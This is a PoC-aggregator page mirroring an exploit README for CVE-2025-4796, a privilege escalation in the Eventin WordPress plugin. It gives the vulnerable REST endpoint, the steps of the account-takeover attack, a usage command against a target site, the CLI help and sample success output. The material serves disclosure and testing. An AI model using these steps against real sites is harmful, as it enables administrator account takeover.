支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: dfc3aea1844162212911a7caf3f59c702a816858

来源
https://github.com/Nxploited/CVE-2025-4796
关联漏洞
标题:WordPress plugin Eventin 安全漏洞 (CVE-2025-4796)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Eventin 4.0.34及之前版本存在安全漏洞,该漏洞源于未正确验证用户身份或能力,可能导致权限提升。
Description
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover
介绍
# CVE-2025-4796
Eventin &lt;= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

# 🛡️ Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation (CVE-2025-4796)

## 📌 Overview
This repository documents a privilege escalation vulnerability in the Eventin WordPress plugin (<= 4.0.34) that allows an authenticated user with Contributor+ capabilities to change arbitrary users' email addresses via the plugin's speaker update API. By changing an administrator's email, an attacker can trigger a password reset and gain account takeover.

- Vulnerable component: Eventin WordPress plugin (Eventin\Speaker\Api\SpeakerController::update_item)
- Affected versions: <= 4.0.34
- CVE: CVE-2025-4796
- CVSS: 8.8 (High)




- Active installations: 10,000+

## ⚠️ Vulnerability Details
Eventin does not properly validate the identity or capability of the caller before updating speaker/user details (specifically email). An attacker who is authenticated as a contributor (or higher) can change the email address of other users — including administrators — using the plugin REST endpoint:
- PUT /wp-json/eventin/v2/speakers/<speaker_id>

Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.

## 🧰 Script (PoC)
Filename: `CVE-2025-4796.py`

This script automates the steps:
1. Log in to the target WordPress site using supplied credentials.
2. Extract the required X-WP-Nonce 
3. Send a PUT request to `/wp-json/eventin/v2/speakers/<speaker_id>` to update the speaker's email.
4. Print and format the JSON response and a professional success message.

Requirements:
- Python 3.8+
- requests

Installation:
```sh
pip install requests
```

## 🚀 Usage
Run the script from the command line:

```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```

Show script help:

```sh
python CVE-2025-4796.py -h
```

## 📝 CLI Options (help)
```sh
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


```
## ✅ Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : Nxploited@gmail.com

[!] Please reset your password using the email: Nxploited@gmail.com
```

## ⚖️ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).

## 🧾 What the script does (concise)
- Validates inputs (URL, email) and normalizes URL schema.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.

## 👤 Credits
By: Khaled Alenaz (Nxploited)  
GitHub: https://github.com/Nxploited/
文件快照

 [4.0K]  /data/pocs/dfc3aea1844162212911a7caf3f59c702a816858
├── [8.7K]  CVE-2025-4796.py
├── [1.5K]  LICENSE
├── [4.2K]  README.md
└── [   9]  requirements.txt

1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。